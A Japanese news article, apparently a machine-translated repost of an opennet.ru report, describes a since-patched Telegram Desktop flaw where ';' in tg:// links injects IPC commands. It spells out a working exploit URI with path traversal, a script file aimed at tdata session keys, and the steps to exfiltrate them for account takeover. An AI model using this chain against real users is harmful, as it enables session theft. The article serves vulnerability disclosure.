Telegramデスクトップ版に存在する脆弱性により、リンクをクリックするだけで任意のファイルを送信できてしまう。

Telegram公式デスクトップクライアントであるTelegram Desktopの脆弱性(CVE-2026-107181)の詳細と悪用方法が公開されました。この問題は、IPCコマンドにおけるエスケープされていない区切り文字の処理が不適切であることに起因します。これにより、共有リンクをクリックすることで、被害者のシステムから攻撃者に任意のファイルを転送することが可能となり、Telegramアカウントの乗っ取りに悪用される可能性のあるセッションキーを含むファイルも転送される恐れがありました。この脆弱性はTelegram Desktop 7.2.9で修正されています。

「tg://」リンクをクリックすると、オペレーティングシステムは、このタイプのリンクに関連付けられたTelegramデスクトップアプリケーションを起動します。システム上でこのアプリケーションの別のインスタンスが既に実行されている場合、実行中のプロセスはIPCイン​​ターフェースを使用してソケット経由でリンクを渡します。問題は、リンクパラメータに「;」文字が含まれている場合(たとえば、「tg://x?a=1;OPEN…」)、コンテンツが分割され、「;」文字以降の部分が個別のコマンドとして処理されることです。

この攻撃では、OPEN コマンドと「interpret:」URI スキームを利用します。これは、IPC を介してサービス スクリプトを起動し、新しいリリースをチャンネルに自動的にプッシュするために使用されます。スクリプトは、チャンネルに送信するファイルとチャンネル ID を指定する、事前に定義されたローカル ファイルです。スクリプトへのファイル パスはサービス サブ ディレクトリを基準として処理されますが、ファイル パスに「../」が削除されないため、攻撃者はベース ディレクトリ外に保存されているファイルにアクセスできます。たとえば、Telegram グループにファイルをアップロードし、次のようなリンクを作成してスクリプトとして参照することができます。

tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt

攻撃の段階:

  • 攻撃者は被害者を自分のグループに追加し(デフォルト設定では、被害者の追加に本人からの確認は不要)、チャンネル名とスクリプトへのパスを記載したテキストファイルをグループに送信します。Telegramは、被害者がグループに参加すると、このファイルをあらかじめ定義されたシステムサブディレクトリに保存します。

    チャンネル: 2005234537
    file: tdata/D877F783D5D3EF8Cs

  • 攻撃者は被害者にホストへの無害に見えるリンク(例:「https://coolsite.org」)を送信し、リダイレクトを介してそれを開くと サーバ 攻撃者の URI は、'tg://x?a=1;OPEN:interpret:…;OPEN:interpret:…' の形式の URI に置き換えられます。
  • リンクがクリックされると、ブラウザは「tg://」URIハンドラを呼び出し、前述のコマンド実行チェーンが開始されます。その結果、通知を表示したり送信の確認を求めたりすることなく、ファイルが攻撃者のチャネルに送信されます。
  • 暗号化キーと認証キーを含むtdataサブディレクトリからファイルを入手し、ユーザーがローカルパスワードを設定していない場合、攻撃者は被害者の接続セッションを自分のデバイス上で複製することができる。

出所: オープンネット.ru

DDoS 保護機能を備えた信頼性の高いサイト用ホスティング、VPS VDS サーバーを購入する 🔥 DDoS攻撃対策付きの信頼性の高いウェブサイトホスティング、VPS/VDSサーバーを購入しましょう | ProHoster